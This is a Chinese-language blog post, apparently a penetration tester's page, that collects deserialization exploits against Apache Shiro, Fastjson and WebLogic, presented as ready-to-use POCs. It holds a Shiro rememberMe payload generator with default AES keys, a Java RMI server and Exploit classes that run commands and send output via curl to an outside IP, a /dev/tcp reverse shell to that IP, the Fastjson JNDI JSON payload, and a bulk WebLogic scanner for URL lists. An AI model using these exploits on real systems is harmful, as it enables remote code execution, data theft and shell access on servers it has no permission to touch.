<!DOCTYPE HTML>
<html>

<head><meta name="generator" content="Hexo 3.8.0">
	<link rel="bookmark" type="image/x-icon" href="/img/logo_miccall.png">
	<link rel="shortcut icon" href="/img/logo_miccall.png">
	
			    <title>
    Kaler
    </title>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no">
    <link rel="stylesheet" href="/css/mic_main.css">
    <link rel="stylesheet" href="/css/dropdownMenu.css">
    <meta name="keywords" content="Kaler">
    
    	<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
	 
    <noscript>
        <link rel="stylesheet" href="/css/noscript.css">
    </noscript>
    <style type="text/css">
        body:before {
          content: ' ';
          position: fixed;
          top: 0;
          background: url('/img/bg.jpg') center 0 no-repeat;
          right: 0;
          bottom: 0;
          left: 0;
          background-size: cover; 
        }
    </style>

			    
  
    <script type="text/x-mathjax-config">
      MathJax.Hub.Config({
        tex2jax: {
          inlineMath: [ ['$','$'], ["\\(","\\)"]  ],
          processEscapes: true,
          skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code']
        }
      });
    </script>

    <script type="text/x-mathjax-config">
      MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax(), i;
        for (i=0; i < all.length; i += 1) {
          all[i].SourceElement().parentNode.className += ' has-jax';
        }
      });
    </script>
    <script async type="text/javascript" src="//cdn.bootcss.com/mathjax/2.7.1/latest.js?config=TeX-AMS-MML_HTMLorMML"></script>
  


    <script src="/js/jquery.min.js"></script>
    <script src="/js/jquery.scrollex.min.js"></script>
    <script src="/js/jquery.scrolly.min.js"></script>
    <script src="/js/skel.min.js"></script>
    <script src="/js/util.js"></script>
    <script src="/js/main.js"></script>
	
</head>
    
		
<!-- Layouts -->



<!--  代码渲染  -->
<link rel="stylesheet" href="/css/prism_coy.css">
<link rel="stylesheet" href="/css/typo.css">
<!-- 文章页 -->
<body class="is-loading">
    <!-- Wrapper 外包 s-->
    <div id="wrapper" class="fade-in">
        <!-- Intro 头部显示 s -->
        <!-- Intro 头部显示 e -->
        <!-- Header 头部logo start -->
        <header id="header">
    <a href="/" class="logo">Go TOP</a>
</header>
        <!-- Nav 导航条 start -->
        <nav id="nav" class="special">
            <ul class="menu links">
			<!-- Homepage  主页  --> 
			<li>
	            <a href="/" rel="nofollow">主页</a>
	        </li>
			<!-- categories_name  分类   --> 
	        
	        <li class="active">
	            <a href="#s1">分类</a>
	                    <ul class="submenu">
	                        <li>
	                        
	                    </li></ul>
	        </li>
	        
	        <!-- archives  归档   --> 
	        
	        
		        <!-- Pages 自定义   -->
		        
		        <li>
		            <a href="/about/" title="简历">
		                简历
		            </a>
		        </li>
		        
		        <li>
		            <a href="/group/" title="团队">
		                团队
		            </a>
		        </li>
		        
		        <li>
		            <a href="/gallery/" title="图库">
		                图库
		            </a>
		        </li>
		        
		        <li>
		            <a href="/tag/" title="标签">
		                标签
		            </a>
		        </li>
		        


            </ul>
            <!-- icons 图标   -->
			<ul class="icons">
                    
                    <li>
                        <a title="github" href="https://www.Kaleryou.github.io" target="_blank" rel="noopener">
                            <i class="icon fa fa-github"></i>
                        </a>
                    </li>
                    
                    <li>
                        <a title="Game" href="/www.4399.com" target="_blank" rel="noopener">
                            <i class="icon fa fa-Game"></i>
                        </a>
                    </li>
                    
			</ul>
</nav>

        <div id="main">
            <div class="post_page_title_img" style="height: 25rem;background-image: url(https://up.enterdesk.com/edpic_source/f1/df/f5/f1dff5ba0901eea024c4e1c54a168503.jpg);background-position: center; background-repeat:no-repeat; background-size:cover;-moz-background-size:cover;overflow:hidden;">
                <a href="#" style="padding: 4rem 4rem 2rem 4rem ;"><h2>盘点那些反序列化漏洞</h2></a>
            </div>
            <!-- Post -->
            <div class="typo" style="padding: 3rem;">
                <blockquote>
<p>百度一搜反序列化漏洞，全是代码审计的过程，没有贴POC和示例网站的，看的就头疼。丝毫不实用，自己对于反序列化又特别特别不擅长，听大手哥们说再过几年没反序列化安服人员都没吃了，有点惭愧，差点在结束反序列化的时期还不会一点反序列化。也明白原来反序列化的利用是这么重要。本篇主要做反序列化漏洞的收集，代码白痴，不涉及任何代码，纯POC及利用/发现方式。希望大家都能做有排面的POC逼佬，别跟狗林学天天装逼。</p>
</blockquote>
<table>
<thead>
<tr>
<th>目录</th>
</tr>
</thead>
<tbody>
<tr>
<td>一、Shiro反序列化</td>
</tr>
<tr>
<td>二、FastJson反序列化</td>
</tr>
<tr>
<td>三、weblogic反序列化_CNVD-C-2019-48814-wls9-async-反序列化</td>
</tr>
</tbody>
</table>
<h2 id="一、Shiro反序列化"><a href="#一、Shiro反序列化" class="headerlink" title="一、Shiro反序列化"></a>一、Shiro反序列化</h2><p><strong>针对版本</strong><br>Apache Shiro &lt;= 1.2.4<br><strong>判断存在流程</strong><br>1）找到一个存在缺陷的网站。主要特征：①登陆界面 ②有”记住我选项”，如图：<br><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/ser-1.png" alt="ser-1"><br>2）使用POC生成脚本<br>POC：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line">import sys</span><br><span class="line">import base64</span><br><span class="line">import uuid</span><br><span class="line">from random import Random</span><br><span class="line">import subprocess</span><br><span class="line">from Crypto.Cipher import AES</span><br><span class="line">def encode_rememberme(command):    </span><br><span class="line">	popen = subprocess.Popen([&apos;java&apos;, &apos;-jar&apos;, &apos;ysoserial-master-SNAPSHOT.jar&apos;, &apos;URLDNS&apos;, command], stdout=subprocess.PIPE)    </span><br><span class="line">	BS = AES.block_size    </span><br><span class="line">	pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()    </span><br><span class="line">	key = &quot;kPH+bIxk5D2deZiIxcaaaA==&quot;</span><br><span class="line">        #key = &quot;4AvVhmFLUs0KTA3Kprsdag==&quot;</span><br><span class="line">        #key = &quot;5aaC5qKm5oqA5pyvAAAAAA==&quot;</span><br><span class="line">	mode = AES.MODE_CBC    </span><br><span class="line">	iv = uuid.uuid4().bytes    </span><br><span class="line">	encryptor = AES.new(base64.b64decode(key), mode, iv)    </span><br><span class="line">	file_body = pad(popen.stdout.read())    </span><br><span class="line">	base64_ciphertext = base64.b64encode(iv + encryptor.encrypt(file_body))    </span><br><span class="line">	return base64_ciphertext</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">if __name__ == &apos;__main__&apos;:    </span><br><span class="line">	payload = encode_rememberme(sys.argv[1])     </span><br><span class="line">	print &quot;rememberMe=&#123;&#125;&quot;.format(payload.decode())</span><br></pre></td></tr></table></figure>
<p>usage：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python shiro.py &quot;http://shiro.b182oj.ceye.io&quot;</span><br></pre></td></tr></table></figure>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/ser-2.png" alt="ser-2"><br>3）登陆，抓包，将生成的rememberMe的字段值添加进去<br><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/ser-3.png" alt="ser-3"><br>4）查看DNS LOG<br><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/ser-4.png" alt="ser-4"></p>
<h1 id="二、FastJson反序列化【转自lazydog】"><a href="#二、FastJson反序列化【转自lazydog】" class="headerlink" title="二、FastJson反序列化【转自lazydog】"></a>二、FastJson反序列化【转自lazydog】</h1><h2 id="0x00-关于fastjson"><a href="#0x00-关于fastjson" class="headerlink" title="0x00 关于fastjson"></a>0x00 关于fastjson</h2><p>fastjson是alibaba开源的一款高性能功能完善的JSON库，在2017年4月18日的时候官方自己爆出了一个安全漏洞，可以围观此<a href="https://github.com/alibaba/fastjson/wiki/security_update_20170315" target="_blank" rel="noopener">链接</a>。</p>
<p>影响范围 1.2.24以及之前版本</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/fast-0.png" alt="fast-0"></p>
<h2 id="0x01-利用手法"><a href="#0x01-利用手法" class="headerlink" title="0x01 利用手法"></a>0x01 利用手法</h2><p>在测试的时候发现大部分请求都是一个url，且大部分Request body中都是有json的，然后就突发奇想的试试后端时候是使用fastjson去解析的json。</p>
<p>我自己大概想出两种方法一种是直接打JdbcRowSetImpl的poc，如果后端是用的fastjson并存在漏洞的话，我用netcat是可以看到请求的。</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/fast-1.png" alt="fast-1"></p>
<p>另一种就是构造异常的json请求，在等后端抛出异常看其中的信息吧，这里我直接删除了最后一个大括号达到了此效果。在StackTrace中可以看到fastjson的身影并使用了方法parseObject</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/fast-2.png" alt="fast-2"><br>漏洞利用的大致流程为</p>
<p>攻击者发送payload=》应用服务parseOjbect=》在去请求我们的rmi service=》应用服务在去获取我们注册的恶意的class并执行=》攻击者获取shell</p>
<p>通过发送构造的poc，我们已经完成了第一步及第二步。接着利用下面的java代码去创建一个rmi，也可以使用marshalsec去创建一个rmi server。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line">•	 import java.rmi.registry.LocateRegistry;</span><br><span class="line">•	 import java.rmi.registry.Registry;</span><br><span class="line">•	 import javax.naming.Reference;</span><br><span class="line">•	 import com.sun.jndi.rmi.registry.ReferenceWrapper;</span><br><span class="line">•	 </span><br><span class="line">•	 @SuppressWarnings(&quot;restriction&quot;)</span><br><span class="line">•	 public class rmi &#123;</span><br><span class="line">•	  /***</span><br><span class="line">•	  * 启动RMI服务</span><br><span class="line">•	  *</span><br><span class="line">•	  * @throws Exception</span><br><span class="line">•	  */</span><br><span class="line">•	  public static void lanuchRMIregister(String host) throws Exception &#123;</span><br><span class="line">•	  System.out.println(&quot;Creating RMI Registry on port 1099&quot;);</span><br><span class="line">•	  Registry registry = LocateRegistry.createRegistry(1099);</span><br><span class="line">•	  // 最终下载恶意类的地址为http://47.89.46.0/Exploit.class</span><br><span class="line">•	  Reference reference = new Reference(&quot;Exploit&quot;, &quot;Exploit&quot;, &quot;http://47.89.46.0/&quot;);</span><br><span class="line">•	  // Reference包装类Exploit</span><br><span class="line">•	  ReferenceWrapper referenceWrapper = new ReferenceWrapper(reference);</span><br><span class="line">•	  registry.bind(&quot;Object&quot;, referenceWrapper);</span><br><span class="line">•	  &#125;</span><br><span class="line">•	  public static void main(String[] args) throws Exception &#123;</span><br><span class="line">•	  System.out.println(&quot;usage: java -jar fastjson_poc.jar ip\n&quot;);</span><br><span class="line">•	  lanuchRMIregister(args[0]);</span><br><span class="line">•	  &#125;</span><br><span class="line">•	 &#125;</span><br></pre></td></tr></table></figure>
<p>在接着构造一个恶意的class,这里我通过执行命令然后将结果通过http请求的方式返回至我的服务器来验证攻击是否成功。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line">•	 import java.io.BufferedInputStream;</span><br><span class="line">•	 import java.io.BufferedReader;</span><br><span class="line">•	 import java.io.InputStreamReader;</span><br><span class="line">•	 </span><br><span class="line">•	 </span><br><span class="line">•	 public class Exploit &#123;</span><br><span class="line">•	  public static String exec(String cmd) throws Exception &#123;</span><br><span class="line">•	  String sb = &quot;&quot;;</span><br><span class="line">•	  BufferedInputStream in = new BufferedInputStream(Runtime.getRuntime().exec(cmd).getInputStream());</span><br><span class="line">•	  BufferedReader inBr = new BufferedReader(new InputStreamReader(in));</span><br><span class="line">•	  String lineStr;</span><br><span class="line">•	  while ((lineStr = inBr.readLine()) != null)</span><br><span class="line">•	  sb += lineStr + &quot;\n&quot;;</span><br><span class="line">•	  inBr.close();</span><br><span class="line">•	  in.close();</span><br><span class="line">•	  return sb;</span><br><span class="line">•	  &#125;</span><br><span class="line">•	  public Exploit() throws Exception &#123;</span><br><span class="line">•	  String result = &quot;&quot;;</span><br><span class="line">•	  result = exec(&quot;whoami&quot;);</span><br><span class="line">•	  String cmd=&quot;curl http://47.89.46.0/&quot;+result;</span><br><span class="line">•	  throw new Exception(exec(cmd));</span><br><span class="line">•	  &#125;</span><br><span class="line">•	 </span><br><span class="line">•	  public static void main(String[] args) throws Exception &#123;</span><br><span class="line">•	  String result = &quot;&quot;;</span><br><span class="line">•	  result = exec(&quot;whoami&quot;);</span><br><span class="line">•	  String cmd=&quot;curl http://47.89.46.0/&quot;+result;</span><br><span class="line">•	  throw new Exception(exec(cmd));</span><br><span class="line">•	  &#125;</span><br><span class="line">•	 &#125;</span><br></pre></td></tr></table></figure>
<p>如果想反弹shell的话用下面的代码就可以</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">•	 import java.lang.Runtime;</span><br><span class="line">•	 import java.lang.Process;</span><br><span class="line">•	 </span><br><span class="line">•	 public class Exploit &#123;</span><br><span class="line">•	  public Exploit() throws Exception &#123;</span><br><span class="line">•	  Runtime rt = Runtime.getRuntime();</span><br><span class="line">•	  String[] commands = &#123;&quot;/bin/sh&quot;, &quot;-c&quot;, &quot;/bin/sh -i &gt; /dev/tcp/47.89.46.0/1337 2&gt;&amp;1 0&gt;&amp;1&quot;&#125;;</span><br><span class="line">•	  Process pc = rt.exec(commands);</span><br><span class="line">•	  pc.waitFor();</span><br><span class="line">•	  &#125;</span><br><span class="line">•	 &#125;</span><br></pre></td></tr></table></figure>
<p>直接<code>javac Exploit.java</code>就可以编译生成Exploit.class</p>
<p>将编译好的rmi.jar及exploit.class放置服务器并运行</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">java -jar rmi.jar VPSIP</span><br></pre></td></tr></table></figure>
<p>在把恶意的class放在我的nginx服务的目录下，这里也可以直接用python -m http.server简单的跑一个httpserver</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/fast-3.png" alt="fast-3"></p>
<p>接着在发送poc至服务器，我们的nginx访问日志中就可以看到被攻击的应用服务在请求我们的class，并将命令执行结果带回来了。</p>
<p>{“@type”:”com.sun.rowset.JdbcRowSetImpl”,”dataSourceName”:”rmi://47.89.46.0:1099/Object”,”autoCommit”:true}</p>
<p><img src="https://raw.githubusercontent.com/Kaleryou/kaleryou.github.io/master/tupian/fast-4.png" alt="fast-4"></p>
<h2 id="三、weblogic反序列化"><a href="#三、weblogic反序列化" class="headerlink" title="三、weblogic反序列化"></a>三、weblogic反序列化</h2><p>1）CNVD-C-2019-48814_wls9-async-反序列化<br><strong>针对性</strong><br><em>wls9_async_response.war</em>包<br><strong>POC_仅用于检测，无有害payload</strong></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"># coding=gbk</span><br><span class="line">import requests</span><br><span class="line"></span><br><span class="line">def check(url):</span><br><span class="line">    checkurl=url+&apos;/_async/AsyncResponseService&apos;</span><br><span class="line">    headers=&#123;</span><br><span class="line">        &apos;User-Agent&apos;: &apos;Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36&apos;,</span><br><span class="line">        &apos;content-type&apos;: &apos;text/xml&apos;</span><br><span class="line">    &#125;</span><br><span class="line">    data=&apos;&apos;&apos;</span><br><span class="line">&lt;soapenv:Envelope xmlns:soapenv=&quot;http://schemas.xmlsoap.org/soap/envelope/&quot; xmlns:wsa=&quot;http://www.w3.org/2005/08/addressing&quot; xmlns:asy=&quot;http://www.bea.com/async/AsyncResponseService&quot;&gt;   </span><br><span class="line">&lt;soapenv:Header&gt; </span><br><span class="line">&lt;wsa:Action&gt;xx&lt;/wsa:Action&gt;</span><br><span class="line">&lt;wsa:RelatesTo&gt;xx&lt;/wsa:RelatesTo&gt;</span><br><span class="line">&lt;work:WorkContext xmlns:work=&quot;http://bea.com/2004/06/soap/workarea/&quot;&gt;</span><br><span class="line">&lt;/work:WorkContext&gt;</span><br><span class="line">&lt;/soapenv:Header&gt;</span><br><span class="line">&lt;soapenv:Body&gt;</span><br><span class="line">&lt;asy:onAsyncDelivery/&gt;</span><br><span class="line">&lt;/soapenv:Body&gt;&lt;/soapenv:Envelope&gt;</span><br><span class="line">    &apos;&apos;&apos;</span><br><span class="line">    r = requests.post(checkurl,headers=headers,data=data)</span><br><span class="line">    if (r.status_code==202):</span><br><span class="line">        print(url+&apos;：vulnerable&apos;)</span><br><span class="line">    else:</span><br><span class="line">        print(url+&apos;：unvulnerable&apos;)</span><br><span class="line"></span><br><span class="line">if __name__ == &quot;__main__&quot;:</span><br><span class="line">    file=input(&apos;Please input your urllist:&apos;)</span><br><span class="line">    with open(file,&quot;r&quot;) as f: </span><br><span class="line">        ftextlist = f.readlines()</span><br><span class="line">    for url in ftextlist:</span><br><span class="line">        url=url.strip(&apos;\n&apos;)</span><br><span class="line">        check(url)</span><br></pre></td></tr></table></figure>
<p>usage：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">##python weblogic.py  </span><br><span class="line">please input your urllist:  url.txt</span><br><span class="line">IP  :  vul/unvul</span><br></pre></td></tr></table></figure>

            </div>

            <!-- Post Comments -->
            
    <!-- 使用 DISQUS_CLICK -->
<div id="disqus-comment">
    <div id="disqus_thread"></div>

<!-- add animation -->
<style>
	.disqus_click_btn {
            line-height: 30px;
            margin: 0;
            min-width: 50px;
            padding: 0 14px;
            display: inline-block;
            font-family: "Roboto", "Helvetica", "Arial", sans-serif;
            font-size: 14px;
            font-weight: 400;
            text-transform: uppercase;
            letter-spacing: 0;
            overflow: hidden;
            will-change: box-shadow;
            transition: box-shadow .2s cubic-bezier(.4, 0, 1, 1), background-color .2s cubic-bezier(.4, 0, .2, 1), color .2s cubic-bezier(.4, 0, .2, 1);
            outline: 0;
            cursor: pointer;
            text-decoration: none;
            text-align: center;
            vertical-align: middle;
            border: 0;
            background: rgba(158, 158, 158, .2);
            box-shadow: 0 2px 2px 0 rgba(0, 0, 0, .14), 0 3px 1px -2px rgba(0, 0, 0, .2), 0 1px 5px 0 rgba(0, 0, 0, .12);
            color: #fff;
            background-color: #7EC0EE;
            text-shadow: 0
        }
</style>
	
<div class="btn_click_load" id="disqus_bt"> 
    <button class="disqus_click_btn">点击查看评论</button>
</div>

<!--
<script type="text/javascript">
$('.btn_click_load').click(function() {
    /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
    var disqus_shortname = 'http-miccall-tech'; // required: replace example with your forum shortname

    /* * * DON'T EDIT BELOW THIS LINE * * */
    (function() {
      var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
      dsq.src = '//' + disqus_shortname + '.disqus.com/embed.js';
      (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
    })();

    document.getElementById('disqus_bt').style.display = "none";
});
</script>
-->
<script type="text/javascript">
    var disqus_config = function () {
        this.page.url = 'http://yoursite.com/2019/04/10/盘点那些反序列化漏洞/';  // Replace PAGE_URL with your page's canonical URL variable
        this.page.identifier = 'http://yoursite.com/2019/04/10/盘点那些反序列化漏洞/'; // Replace PAGE_IDENTIFIER with your page's unique identifier variable
    };
</script>

<script type="text/javascript">
    $('.btn_click_load').click(function() {  //click to load comments
        (function() { // DON'T EDIT BELOW THIS LINE
            var d = document;
            var s = d.createElement('script');
            s.src = '//http-miccall-tech.disqus.com/embed.js';
            s.setAttribute('data-timestamp', + new Date());
            (d.head || d.body).appendChild(s);
        })();
        $('.btn_click_load').css('display','none');
    });
</script>
</div>
<style>
    #disqus-comment{
        background-color: #eee;
        padding: 2pc;
    }
</style>


        </div>
        <!-- Copyright 版权 start -->
                <div id="copyright">
            <ul>
                <li>&copy;Powered By <a href="https://hexo.io/zh-cn/" style="border-bottom: none;">hexo</a></li>
                <li>Design: <a href="http://miccall.tech " style="border-bottom: none;">miccall</a></li>
            </ul>
            
                <span id="busuanzi_container_site_pv">本站总访问量<span id="busuanzi_value_site_pv"></span>次</span>
			
        </div>
    </div>
</body>



 	
</html>
